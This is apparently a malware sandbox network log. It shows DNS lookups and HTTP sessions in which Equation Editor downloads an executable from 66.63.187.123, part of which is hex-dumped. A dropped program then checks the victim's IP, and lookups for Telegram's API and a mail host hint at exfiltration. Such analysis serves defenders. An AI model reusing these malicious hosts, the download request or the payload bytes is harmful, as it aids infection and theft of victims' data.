Sep 26, 2024 09:19:36.067337036 CEST	8.8.8.8	192.168.2.22	0x7205	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:36.067337036 CEST	8.8.8.8	192.168.2.22	0x7205	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:36.067337036 CEST	8.8.8.8	192.168.2.22	0x7205	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:37.908869982 CEST	8.8.8.8	192.168.2.22	0x9c7e	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:37.908869982 CEST	8.8.8.8	192.168.2.22	0x9c7e	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:38.595184088 CEST	8.8.8.8	192.168.2.22	0xe37f	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Sep 26, 2024 09:19:38.595184088 CEST	8.8.8.8	192.168.2.22	0xe37f	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:38.595184088 CEST	8.8.8.8	192.168.2.22	0xe37f	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:38.595184088 CEST	8.8.8.8	192.168.2.22	0xe37f	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:38.595184088 CEST	8.8.8.8	192.168.2.22	0xe37f	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:38.595184088 CEST	8.8.8.8	192.168.2.22	0xe37f	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:38.624263048 CEST	8.8.8.8	192.168.2.22	0xa3d1	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Sep 26, 2024 09:19:38.624263048 CEST	8.8.8.8	192.168.2.22	0xa3d1	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:38.624263048 CEST	8.8.8.8	192.168.2.22	0xa3d1	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:38.624263048 CEST	8.8.8.8	192.168.2.22	0xa3d1	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:38.624263048 CEST	8.8.8.8	192.168.2.22	0xa3d1	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:38.624263048 CEST	8.8.8.8	192.168.2.22	0xa3d1	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:39.546693087 CEST	8.8.8.8	192.168.2.22	0x7530	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:39.546693087 CEST	8.8.8.8	192.168.2.22	0x7530	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:40.178802013 CEST	8.8.8.8	192.168.2.22	0xa9b5	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Sep 26, 2024 09:19:40.178802013 CEST	8.8.8.8	192.168.2.22	0xa9b5	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:40.178802013 CEST	8.8.8.8	192.168.2.22	0xa9b5	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:40.178802013 CEST	8.8.8.8	192.168.2.22	0xa9b5	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:40.178802013 CEST	8.8.8.8	192.168.2.22	0xa9b5	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:40.178802013 CEST	8.8.8.8	192.168.2.22	0xa9b5	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:40.187988997 CEST	8.8.8.8	192.168.2.22	0xbe6e	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Sep 26, 2024 09:19:40.187988997 CEST	8.8.8.8	192.168.2.22	0xbe6e	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:40.187988997 CEST	8.8.8.8	192.168.2.22	0xbe6e	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:40.187988997 CEST	8.8.8.8	192.168.2.22	0xbe6e	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:40.187988997 CEST	8.8.8.8	192.168.2.22	0xbe6e	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:40.187988997 CEST	8.8.8.8	192.168.2.22	0xbe6e	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:40.665707111 CEST	8.8.8.8	192.168.2.22	0xd5c4	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:40.665707111 CEST	8.8.8.8	192.168.2.22	0xd5c4	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:41.288538933 CEST	8.8.8.8	192.168.2.22	0x14e2	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:58.405874968 CEST	8.8.8.8	192.168.2.22	0x4102	No error (0)	mail.jhxkgroup.online		217.12.218.219	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:20:03.569721937 CEST	8.8.8.8	192.168.2.22	0xb364	No error (0)	mail.jhxkgroup.online		217.12.218.219	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:20:15.832356930 CEST	8.8.8.8	192.168.2.22	0x77cb	No error (0)	mail.jhxkgroup.online		217.12.218.219	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:20:58.353182077 CEST	8.8.8.8	192.168.2.22	0x4336	No error (0)	mail.jhxkgroup.online		217.12.218.219	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:20:58.360304117 CEST	8.8.8.8	192.168.2.22	0x4336	No error (0)	mail.jhxkgroup.online		217.12.218.219	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:20:58.367763042 CEST	8.8.8.8	192.168.2.22	0x4336	No error (0)	mail.jhxkgroup.online		217.12.218.219	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:20:58.375001907 CEST	8.8.8.8	192.168.2.22	0x4336	No error (0)	mail.jhxkgroup.online		217.12.218.219	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:20:58.402622938 CEST	8.8.8.8	192.168.2.22	0x4336	No error (0)	mail.jhxkgroup.online		217.12.218.219	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:20:58.641184092 CEST	8.8.8.8	192.168.2.22	0xbf35	No error (0)	mail.jhxkgroup.online		217.12.218.219	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:20:58.675951004 CEST	8.8.8.8	192.168.2.22	0xbf35	No error (0)	mail.jhxkgroup.online		217.12.218.219	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:20:58.683180094 CEST	8.8.8.8	192.168.2.22	0xbf35	No error (0)	mail.jhxkgroup.online		217.12.218.219	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:20:58.690274000 CEST	8.8.8.8	192.168.2.22	0xbf35	No error (0)	mail.jhxkgroup.online		217.12.218.219	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:20:58.697407961 CEST	8.8.8.8	192.168.2.22	0xbf35	No error (0)	mail.jhxkgroup.online		217.12.218.219	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:00.336644888 CEST	8.8.8.8	192.168.2.22	0x7af	No error (0)	mail.jhxkgroup.online		217.12.218.219	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:00.343810081 CEST	8.8.8.8	192.168.2.22	0x7af	No error (0)	mail.jhxkgroup.online		217.12.218.219	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:00.350385904 CEST	8.8.8.8	192.168.2.22	0x7af	No error (0)	mail.jhxkgroup.online		217.12.218.219	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:00.357374907 CEST	8.8.8.8	192.168.2.22	0x7af	No error (0)	mail.jhxkgroup.online		217.12.218.219	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:00.365541935 CEST	8.8.8.8	192.168.2.22	0x7af	No error (0)	mail.jhxkgroup.online		217.12.218.219	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:02.930648088 CEST	8.8.8.8	192.168.2.22	0x6efe	No error (0)	mail.jhxkgroup.online		217.12.218.219	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:02.937877893 CEST	8.8.8.8	192.168.2.22	0x6efe	No error (0)	mail.jhxkgroup.online		217.12.218.219	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:02.944807053 CEST	8.8.8.8	192.168.2.22	0x6efe	No error (0)	mail.jhxkgroup.online		217.12.218.219	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:02.967027903 CEST	8.8.8.8	192.168.2.22	0x6efe	No error (0)	mail.jhxkgroup.online		217.12.218.219	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:02.974311113 CEST	8.8.8.8	192.168.2.22	0x6efe	No error (0)	mail.jhxkgroup.online		217.12.218.219	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:03.139451027 CEST	8.8.8.8	192.168.2.22	0x616c	No error (0)	mail.jhxkgroup.online		217.12.218.219	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:03.146608114 CEST	8.8.8.8	192.168.2.22	0x616c	No error (0)	mail.jhxkgroup.online		217.12.218.219	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:03.153793097 CEST	8.8.8.8	192.168.2.22	0x616c	No error (0)	mail.jhxkgroup.online		217.12.218.219	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:03.161292076 CEST	8.8.8.8	192.168.2.22	0x616c	No error (0)	mail.jhxkgroup.online		217.12.218.219	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:03.168138981 CEST	8.8.8.8	192.168.2.22	0x616c	No error (0)	mail.jhxkgroup.online		217.12.218.219	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:03.351737976 CEST	8.8.8.8	192.168.2.22	0xd70a	No error (0)	mail.jhxkgroup.online		217.12.218.219	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:03.360160112 CEST	8.8.8.8	192.168.2.22	0xd70a	No error (0)	mail.jhxkgroup.online		217.12.218.219	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:03.367604971 CEST	8.8.8.8	192.168.2.22	0xd70a	No error (0)	mail.jhxkgroup.online		217.12.218.219	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:03.375056028 CEST	8.8.8.8	192.168.2.22	0xd70a	No error (0)	mail.jhxkgroup.online		217.12.218.219	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:03.381688118 CEST	8.8.8.8	192.168.2.22	0xd70a	No error (0)	mail.jhxkgroup.online		217.12.218.219	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:03.654923916 CEST	8.8.8.8	192.168.2.22	0xef90	No error (0)	mail.jhxkgroup.online		217.12.218.219	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:03.661277056 CEST	8.8.8.8	192.168.2.22	0xef90	No error (0)	mail.jhxkgroup.online		217.12.218.219	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:03.668488026 CEST	8.8.8.8	192.168.2.22	0xef90	No error (0)	mail.jhxkgroup.online		217.12.218.219	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:03.675648928 CEST	8.8.8.8	192.168.2.22	0xef90	No error (0)	mail.jhxkgroup.online		217.12.218.219	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:03.682908058 CEST	8.8.8.8	192.168.2.22	0xef90	No error (0)	mail.jhxkgroup.online		217.12.218.219	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:07.177917004 CEST	8.8.8.8	192.168.2.22	0x5956	No error (0)	mail.jhxkgroup.online		217.12.218.219	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:07.185512066 CEST	8.8.8.8	192.168.2.22	0x5956	No error (0)	mail.jhxkgroup.online		217.12.218.219	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:07.192739010 CEST	8.8.8.8	192.168.2.22	0x5956	No error (0)	mail.jhxkgroup.online		217.12.218.219	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:07.199989080 CEST	8.8.8.8	192.168.2.22	0x5956	No error (0)	mail.jhxkgroup.online		217.12.218.219	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:07.207165956 CEST	8.8.8.8	192.168.2.22	0x5956	No error (0)	mail.jhxkgroup.online		217.12.218.219	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:07.390434980 CEST	8.8.8.8	192.168.2.22	0x44e3	No error (0)	mail.jhxkgroup.online		217.12.218.219	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:07.397711039 CEST	8.8.8.8	192.168.2.22	0x44e3	No error (0)	mail.jhxkgroup.online		217.12.218.219	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:07.405448914 CEST	8.8.8.8	192.168.2.22	0x44e3	No error (0)	mail.jhxkgroup.online		217.12.218.219	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:07.412259102 CEST	8.8.8.8	192.168.2.22	0x44e3	No error (0)	mail.jhxkgroup.online		217.12.218.219	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:07.419365883 CEST	8.8.8.8	192.168.2.22	0x44e3	No error (0)	mail.jhxkgroup.online		217.12.218.219	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:07.736274958 CEST	8.8.8.8	192.168.2.22	0x1a4d	No error (0)	mail.jhxkgroup.online		217.12.218.219	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:07.742820024 CEST	8.8.8.8	192.168.2.22	0x1a4d	No error (0)	mail.jhxkgroup.online		217.12.218.219	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:07.750003099 CEST	8.8.8.8	192.168.2.22	0x1a4d	No error (0)	mail.jhxkgroup.online		217.12.218.219	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:07.756540060 CEST	8.8.8.8	192.168.2.22	0x1a4d	No error (0)	mail.jhxkgroup.online		217.12.218.219	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:07.763091087 CEST	8.8.8.8	192.168.2.22	0x1a4d	No error (0)	mail.jhxkgroup.online		217.12.218.219	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:07.950901031 CEST	8.8.8.8	192.168.2.22	0xf11b	No error (0)	mail.jhxkgroup.online		217.12.218.219	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:07.958105087 CEST	8.8.8.8	192.168.2.22	0xf11b	No error (0)	mail.jhxkgroup.online		217.12.218.219	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:07.965656996 CEST	8.8.8.8	192.168.2.22	0xf11b	No error (0)	mail.jhxkgroup.online		217.12.218.219	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:07.972901106 CEST	8.8.8.8	192.168.2.22	0xf11b	No error (0)	mail.jhxkgroup.online		217.12.218.219	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:07.980240107 CEST	8.8.8.8	192.168.2.22	0xf11b	No error (0)	mail.jhxkgroup.online		217.12.218.219	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:09.276721001 CEST	8.8.8.8	192.168.2.22	0x7ef5	No error (0)	mail.jhxkgroup.online		217.12.218.219	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:09.285681009 CEST	8.8.8.8	192.168.2.22	0x7ef5	No error (0)	mail.jhxkgroup.online		217.12.218.219	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:09.292628050 CEST	8.8.8.8	192.168.2.22	0x7ef5	No error (0)	mail.jhxkgroup.online		217.12.218.219	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:09.299113035 CEST	8.8.8.8	192.168.2.22	0x7ef5	No error (0)	mail.jhxkgroup.online		217.12.218.219	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:09.306920052 CEST	8.8.8.8	192.168.2.22	0x7ef5	No error (0)	mail.jhxkgroup.online		217.12.218.219	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:10.622241974 CEST	8.8.8.8	192.168.2.22	0x3468	No error (0)	mail.jhxkgroup.online		217.12.218.219	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

api.telegram.org

66.63.187.123

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.22	49161	66.63.187.123	80	3268	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 09:19:21.363132954 CEST	324	OUT	GET /txt/XcsQpLjhNNvxYtrw.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 66.63.187.123 Connection: Keep-Alive
Sep 26, 2024 09:19:22.079797029 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.26.2 Date: Thu, 26 Sep 2024 07:19:21 GMT Content-Type: application/x-msdos-program Content-Length: 708096 Connection: keep-alive Last-Modified: Thu, 26 Sep 2024 03:39:16 GMT ETag: "ace00-622fd7b9e4c97" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 fa d6 f4 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 a8 0a 00 00 24 00 00 00 00 00 00 9e c6 0a 00 00 20 00 00 00 e0 0a 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c c6 0a 00 4f 00 00 00 00 e0 0a 00 ac 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELf0$ @ @@LO H.text `.rsrc "@@.reloc @BHY\5, 70\|((}{(}(}(}(}(}(}(}0!( lY mZ(X+0ms} }#cA} ig}#c} 's}s}}}((8>%,os{{(}
Sep 26, 2024 09:19:22.079852104 CEST	224	IN	Data Raw: 7b 03 00 00 04 02 7b 0b 00 00 04 28 20 00 00 0a 7d 0b 00 00 04 02 08 7b 01 00 00 04 02 7b 0c 00 00 04 28 21 00 00 0a 7d 0c 00 00 04 02 08 7b 03 00 00 04 02 7b 0d 00 00 04 28 22 00 00 0a 7d 0d 00 00 04 02 02 7b 0e 00 00 04 08 7b 08 00 00 04 28 23 Data Ascii: {{( }{{(!}{{("}{{(#-{+{}{{($-{+{}{{o%Xi:*0#$@Yl#$@(&
Sep 26, 2024 09:19:22.079896927 CEST	1236	IN	Data Raw: 00 00 0a 28 27 00 00 0a 28 28 00 00 0a 69 7d 10 00 00 04 02 23 00 00 00 00 00 00 24 40 0e 05 0e 04 59 6c 23 00 00 00 00 00 00 24 40 28 26 00 00 0a 28 27 00 00 0a 28 28 00 00 0a 69 7d 11 00 00 04 16 0a 2b 57 00 06 20 90 01 00 00 5a 6b 05 04 59 6b Data Ascii: ('((i}#$@Yl#$@(&('((i}+W ZkYk[l{],()+(k"k"Co+{k" A[i(!XY-s,8 ZkYk[l{],()+("k"Ck
Sep 26, 2024 09:19:22.079940081 CEST	1236	IN	Data Raw: 09 00 00 04 6f 39 00 00 0a 11 17 6f 3a 00 00 0a 7b 04 00 00 04 09 59 23 00 00 00 00 00 00 79 40 5a 11 04 5b 13 19 02 7b 09 00 00 04 6f 39 00 00 0a 11 17 6f 3a 00 00 0a 7b 05 00 00 04 09 59 23 00 00 00 00 00 00 79 40 5a 11 04 5b 13 1a 02 7b 09 00 Data Ascii: o9o:{Y#y@Z[{o9o:{Y#y@Z[{o9o:{Y#y@Z[{o9o:{Y#y@Z[1(A+(=kkkko+,,(B#@[Ykkk
Sep 26, 2024 09:19:22.079977036 CEST	448	IN	Data Raw: 00 00 13 30 02 00 2b 00 00 00 0b 00 00 11 00 03 2c 0b 02 7b 12 00 00 04 14 fe 03 2b 01 16 0a 06 2c 0e 00 02 7b 12 00 00 04 6f 4f 00 00 0a 00 00 02 03 28 52 00 00 0a 00 2a 00 13 30 05 00 a4 00 00 00 0c 00 00 11 00 d0 04 00 00 02 28 53 00 00 0a 73 Data Ascii: 0+,{+,{oO(R0(SsT(U"A"AsV(W(X ~ sY(Zrpo[tQ(\(]s^(_rp(`r#po3(a(b0[
Sep 26, 2024 09:19:22.080013037 CEST	1236	IN	Data Raw: 0a 00 02 7b 2a 00 00 04 02 7b 13 00 00 04 7c 0f 00 00 04 28 19 00 00 0a 28 66 00 00 0a 6f 69 00 00 0a 00 02 7b 27 00 00 04 02 7b 13 00 00 04 7c 0e 00 00 04 28 6a 00 00 0a 17 59 6f 6b 00 00 0a 00 02 7b 2c 00 00 04 02 7b 13 00 00 04 7c 0f 00 00 04 Data Ascii: {{\|((foi{'{\|(jYok{,{\|(jYok({%{\|(l(foi{.{\|(l(foi{)smon{smon{'smoo
Sep 26, 2024 09:19:22.080123901 CEST	1236	IN	Data Raw: 00 00 02 00 1c 00 24 40 00 0f 00 00 00 00 13 30 04 00 3b 00 00 00 0b 00 00 11 00 02 16 7d 1e 00 00 04 02 7b 30 00 00 04 16 6f 86 00 00 0a 00 02 7b 32 00 00 04 02 7b 31 00 00 04 17 25 0a 6f 86 00 00 0a 00 06 6f 86 00 00 0a 00 02 03 04 28 11 00 00 Data Ascii: $@0;}{0o{2{1%oo(0;}{1o{2{0%oo(0;}{2o{0{1%oo(*0
Sep 26, 2024 09:19:22.080177069 CEST	448	IN	Data Raw: 24 00 00 04 1c 16 1c 16 73 5e 00 00 0a 6f 8d 00 00 0a 00 02 7b 24 00 00 04 72 99 00 00 70 6f 60 00 00 0a 00 02 7b 24 00 00 04 1f 5e 1f 20 73 59 00 00 0a 6f 8e 00 00 0a 00 02 7b 24 00 00 04 1f 0a 6f 8f 00 00 0a 00 02 7b 24 00 00 04 72 a7 00 00 70 Data Ascii: $s^o{$rpo`{$^ sYo{$o{$rpo3{% s0o1{%s^o{%C%soh{%C%sog{%rpo`{%l&sYo{%o
Sep 26, 2024 09:19:22.080213070 CEST	1236	IN	Data Raw: 18 72 ff 00 00 70 a2 25 19 72 0b 01 00 70 a2 25 1a 72 17 01 00 70 a2 25 1b 72 1f 01 00 70 a2 25 1c 72 29 01 00 70 a2 25 1d 72 33 01 00 70 a2 25 1e 72 41 01 00 70 a2 25 1f 09 72 55 01 00 70 a2 25 1f 0a 72 65 01 00 70 a2 25 1f 0b 72 77 01 00 70 a2 Data Ascii: rp%rp%rp%rp%r)p%r3p%rAp%rUp%rep%rwpo{' s0o1{'s^o{'rpo`{' 'sYo{'o{'smoo{(o{( us0
Sep 26, 2024 09:19:22.080250025 CEST	1236	IN	Data Raw: 04 1f 41 1f 20 73 59 00 00 0a 6f 8e 00 00 0a 00 02 7b 2d 00 00 04 1f 12 6f 8f 00 00 0a 00 02 7b 2d 00 00 04 72 d5 00 00 70 6f 33 00 00 0a 00 02 7b 2e 00 00 04 20 8c 03 00 00 20 9c 04 00 00 73 30 00 00 0a 6f 31 00 00 0a 00 02 7b 2e 00 00 04 1c 1c Data Ascii: A sYo{-o{-rpo3{. s0o1{.s^o{.C%soh{.C%sog{.rpo`{.l&sYo{.o{.C%soi{/o
Sep 26, 2024 09:19:22.084897041 CEST	1236	IN	Data Raw: 00 00 04 1f 1b 6f 8f 00 00 0a 00 02 7b 35 00 00 04 72 33 03 00 70 6f 33 00 00 0a 00 02 7b 35 00 00 04 17 6f 95 00 00 0a 00 02 7b 35 00 00 04 02 fe 06 11 00 00 06 73 6d 00 00 0a 6f 99 00 00 0a 00 02 7b 36 00 00 04 17 6f 90 00 00 0a 00 02 7b 36 00 Data Ascii: o{5r3po3{5o{5smo{6o{6@o{6(o{6 os0o1{6s^o{6r9po`{6U$sYo{6o{6rCpo3{6o{6

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.22	49162	193.122.130.0	80	3508	C:\Users\user\AppData\Roaming\hgqilegacy20306.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 09:19:26.832587957 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Sep 26, 2024 09:19:27.301414013 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 07:19:27 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 787ba4bb939bcdf2d766299b7ae5d52b Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Sep 26, 2024 09:19:27.392745972 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Sep 26, 2024 09:19:27.502219915 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 07:19:27 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: c5e690127df1af047ae7e01861376bb5 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Sep 26, 2024 09:19:28.709939003 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
